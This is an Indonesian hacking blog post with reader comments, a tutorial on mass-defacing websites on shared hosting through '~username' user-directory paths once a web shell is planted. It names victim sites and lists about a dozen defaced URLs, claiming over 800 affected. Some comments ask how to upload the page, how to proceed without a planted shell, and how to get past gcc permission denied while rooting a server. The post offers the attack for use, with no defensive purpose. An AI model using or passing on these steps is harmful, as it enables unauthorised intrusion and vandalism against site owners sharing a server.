• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Tutorial Deface Dengan Fake Root | User Enumeration

July 20, 2013 by Jack Wilder 11 Comments

Sebenarnya saya sendiri bingung mau diaksih judul apa. Saya dapet dari threadnya bang Rebels di Forum Devilzc0de. Aslinya User Enumeration tapi tidak serumit itu. :v . Yasudah, langsung saja prakteknya.
Berikut bahan-bahan yang diperlukan :
Reverse IP
Shell yang sudah tertanam di web korban.

Exploit :
http://www.example.com/~root

Cek web yang sudah tertanam shell dengan exploit diatas.
Contoh :
http://mysled.net/~root maka hasilnya forbidden.

Langkah selanjutnya, upload script deface di public_html .
ex : http://mysled.net/crot.html

Oke, sekarang saatnya melihat domain ayng berada satu server dengan http://mysled.net/.
Sobat bisa menggunakan web Reverse IP diatas atau jika shell sobat sudah dilengkapi dengan tools Local Domain Viewer(tools 1n73ction sudah ada), tinggan klik menu DOMAIN.
Wow, ada 874 domain.

Nah, cara melihat hasil fake root nya exploit begini :
http://www.example.com /~dirdibelakang public_html / scriptmu.html

Lihat dir dibelakang public-html
contoh , /home/mysledne/public_html/ .
Karena saya tadi mengupload script crot.html di public_html,
coba cek salahsatu domain yang satu server dengan exploit diatas.
Contoh domain yang satu server dengan http://mysled.net/ adalah http://80s-clothing.com
Cek, http://80s-clothing.com/~mysledne/crot.html

Defaced . 🙂
Hal itu akan terjadi di 800 domain lainnya tanpa ada susah susah melakukan mass deface server. Cukup tambahkan ~mysledne/crot.html
See More :

allaboutalberta.com/~mysledne/crot.html
http://aerosealcalgary.com/~mysledne/crot.html
http://aeroanalys.ca/~mysledne/crot.html
http://advicecounselling.com/~mysledne/crot.html
http://adultlifedirectory.com/~mysledne/crot.html
http://70s-fashion.net/~mysledne/crot.html
http://50s-fashion.com/~mysledne/crot.html
http://livre-audio.ca/~mysledne/crot.html
http://60s-fashion.net/~mysledne/crot.html
http://accountantscalgary.biz/~mysledne/crot.html
http://allaboutcalgary.com/~mysledne/crot.html

Dan amsih banyak lagi. Ada 800 domain lebih. 🙂

Sekian dan semoga bermanfaat.

./Nabilaholic404

Yang mau copas, sertakan sumber.
www.madura-cyber.org

Refrensi :
devilzc0de

Shares

Filed Under: Uncategorized Tagged With: Hacking

Reader Interactions

Comments

  1. Yoga Pamungkas says

    July 20, 2013 at 2:04 am

    nambah lagi deh ilmu nya 😀

    Reply
  2. Anonim says

    July 20, 2013 at 7:19 am

    Cara Uploadnya gimana??

    Reply
  3. cak oni says

    July 21, 2013 at 6:22 am

    waa puasa kog nambah ginian kang , bukannya ceramah 😀 v oioioi

    Reply
  4. sakti blood says

    July 24, 2013 at 4:40 pm

    1. upload ke public_html nya gimana?
    2. ga ngerti penjelasannya

    Reply
  5. Riypto rypto says

    July 28, 2013 at 1:22 pm

    Tutornya kurang jelas, kurang detail.
    lo buat tutor instant, keliatan copy paste.

    Reply
    • chiaki says

      August 22, 2013 at 11:00 am

      lu nya aja yg bego. ngomong asal njeplak. tunjukin dong gw copas darimana .!

      Reply
  6. infinity blog says

    September 23, 2013 at 6:46 am

    kak.. mau tanya hehe
    aku agak bingung kak.. kalau targetnya belum tertanam shell gimana kak ?
    please reply

    Reply
  7. Dodhie Virgo says

    November 3, 2013 at 5:33 pm

    Bang, Upload script deface gimana??

    Reply
  8. Hata Ke says

    December 13, 2013 at 8:07 am

    Bang, Waktu ane klik Domain di shell 1n73ction kok ada tulisan # can't ReaD -> [ /etc/named.conf ]

    Reply
  9. Anonim says

    January 4, 2014 at 2:18 am

    kalau saat di exploit gk forbidden gmn kak?

    Reply
  10. C0M64D3_V415H4KH says

    December 29, 2019 at 12:37 pm

    Bro when i rooting server gcc permission denied.
    how can i bypass it?

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

GitHub Custom Domain or Subdomain Takeover

WordPress Plugin CopySafe PDF Protection Shell Upload

FastMail Custom Domain or Subdomain Takeover

Exploit WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability

Open Redirect Bypass Cheat Sheet

Deteksi Celah No Redirect pada Suatu Situs menggunakan cURL

Zendesk Custom Domain or Subdomain Takeover

Azure Traffic Manager Custom Domain or Subdomain Takeover

CVE-2019-13360 – CentOS Control Web Panel Authentication Bypass

Shopify Custom Domain or Subdomain Takeover

LinuxSec / 87 queries in 0.18 seconds